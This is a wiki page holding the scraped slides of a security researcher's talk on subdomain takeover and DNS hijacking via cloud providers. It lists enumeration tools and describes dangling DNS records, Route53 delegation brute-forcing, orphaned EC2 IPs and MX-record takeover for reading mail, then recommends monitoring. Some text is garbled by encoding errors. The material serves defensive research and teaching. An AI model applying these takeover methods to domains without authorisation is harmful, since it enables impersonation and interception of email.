## page was renamed from DNS/hijacking/detectify
= DNS/hijacking/detectify =

[[/Guide]]
https://labs.detectify.com/2014/10/21/hostile-subdomain-takeover-using-herokugithubdesk-more/

[[/herokugithubdesk]]

Hostile Subdomain Takeover using Heroku/Github/Desk + more
October 21, 2014 


----

https://www.slideshare.net/fransrosen/dns-hijacking-using-cloud-providers-no-verification-needed-76812183

== slide ==

DNS hijacking using cloud providers – No verification needed

 1. DNS hijacking using cloud providers - no verification needed
 2. Frans Rosen Security Advisor @detectify ( twitter: @fransrosen ) HackerOne #5 @ hackerone.com/leaderboard/all-time Blog at labs.detectify.com Talked here last year! "The Secret life of a Bug Bounty Hunter"
 3. Rundown o Background o History o Tools & Techniques o Deeper levels of hijacking o Evolution o Mitigations o Monitoring
 4. Subdomain Takeover v1.0 campaign.site.com Campaign!
 5. Subdomain Takeover v1.0 campaign.site.com Campaign! Fake site!
 6. Ever seen one of these?
 7. First instance, 12th Oct '14 http://esevece.tumblr.com/post/99786512849/onavo-cname-records-pointing-to-heroku-but-no
 8. https://labs.detectify.com/2014/10/21/hostile-subdomain-takeover-using-herokugithubdesk-more/ 9 days later, 21st Oct '14
 9. Response from services Heroku: 
    臓�e're aware of this issue臓�GitHub: 
   臓�y apologies for the delayed response. We are aware of this issue臓�Shopify: 
   臓� had already identified that this is a security issue臓�    10. What have we seen?
 11. What have we seen? https://hackerone.com/reports/172137
 12. What have we seen?
 13. What have we seen? https://hackerone.com/reports/32825
 14. What have we seen?
 15. What have we seen? https://crt.sh/?q=%25.uber.com
 16. What have we seen? https://blog.rubidus.com/2017/02/03/deep-thoughts-on-subdomain-takeovers/
 17. What have we seen? https://labs.detectify.com/2016/10/05/the-story-of-ev-ssl-aws-and-trailing-dot-domains/
 18. What have we seen?
 19. What have we seen?
 20. What have we seen?

 21. Tools
 22. subbrute Not active dev. https://github.com/TheRook/subbrute
 23. Sublist3r https://github.com/aboul3la/Sublist3r Active dev! Took over subbrute! Fetching from multiple sources
 24. massdns https://github.com/blechschmidt/massdns Fast as hell! Needs lists to resolve
 25. altdns https://github.com/infosec-au/altdns Soo soo powerful if you have good mutations Combine with massdns == success Can resolve, but better for just creating the lists
 26. tko-subs https://github.com/anshumanbh/tko-subs Interesting idea, auto takeover when finding issues Might be a liiittle bit too aggressive

 27. We could look here?
 28. WRONG! WRONG! WRONG! WRONG! WRONG! WRONG! WRONG!WRONG!
 29. WRONG! Resolve and not resolve is what matters.
 30. Dead DNS records
 31. A dead record?
 32. A dead record?
 33. dig is your friend
 34. 9 year old bug

 35. https://thehackerblog.com/the-orphaned-internet-taking-over-120k-domains-via- a-dns-vulnerability-in-aws-google-cloud-rackspace-and-digital-ocean/index.html SERVFAIL/REFUSED

 36. Also works on subdomain delegations!
 37. NOERROR Resolves. All OK. DNS status codes
 38. DNS status codes NXDOMAIN Doesn臓� exist. Could still have a DNS RR. Query NS to find out more.
 39. DNS status codes REFUSED NS does not like this domain.
 40. DNS status codes SERVFAIL Not even responding. Very interesting!
 41. The tools find what? SERVFAIL REFUSED NOERROR NXDOMAIN ????
 42. Subdomain delegation
 43. Subdomain delegation
 44. Subdomain delegation

 45. Brute add/delete R53 DNS
 46. We now control the domain!

 47. Orphaned EC2 IPs https://www.bishopfox.com/blog/2015/10/fishing-the-aws-ip-pool-for-dangling-domains/
 48. Orphaned EC2 IPs
 49. dev.on.site.com http://integrouschoice.com/
 50. dev.on.site.com
 51. dev.on.site.com
 52. Flow Brute * Collect NOERROR * Collect SERVFAIL / REFUSED +trace the NS * Collect NXDOMAIN if CNAME, +trace
 53. Flow Resolve * Check NOERROR for patterns * SERVFAIL/REFUSED, Check NS for patterns * NXDOMAIN, traverse up to apex, check: NXDOMAIN|SERVFAIL|REFUSED|no servers could be reached
 54. Flow Improve * Collect all subdomain names * Sort them by popularity * Sort www below all names with p>2
 55. Flow Analyze unknowns * Collect titles of all sites (or EyeWitness!) * Filter out common titles + name of company * Generate screenshots, create a image map https://github.com/ChrisTruncer/EyeWitness
 56. Flow Repeat * Do it every day * Push notification changes
 57. Jan 2017
 58. Jan 2017
 59. Jan 2017
 60. Jan 2017
 61. Jan 2017
 62. Jan 2017
 63. Jan 2017

 64. Monitoring is really preventing this. Psst, this is exactly what we do! Shameless plug
 65. The competition @avlidienbrunn @arneswinnen @TheBoredEng
 66. My takeovers since 2014-10
 67. detectify
 68. Email snooping!
 69. September 2016 http://blog.pentestnepal.tech/post/149985438982/reading-ubers-internal-emails-uber-bug-bounty
 70. 2 of the 3 in action
 71. MX-records Inbound mail. This is important.
 72. MX-records
 73. Conflict check + Validation
 74. Oh, add this!
 75. CNAME -> MX
 76. Whitelisted aliases for verification
 77. Back to this
 78. Tadaa!
 79. We now get postmaster!
 80. Response the day after
 81. Response the day after
 82. Response the day after
 83. On a final note https://twitter.com/realdonaldtrump/status/190093504939163648
 84. On a final note https://twitter.com/realdonaldtrump/status/190093504939163648
 85. On a final note
 86. On a final note
 87. On a final note
 88. Recap o Know your DNS Zone file
     MX, CNAME, A, AAAA, ALIAS. Everything.
     o AUTOMATION, probably the only proper solution o will.i.am loves this
 89. Go hack yourself! Questions? Frans Rosen (@fransrosen) - www.detectify.com

    Recommended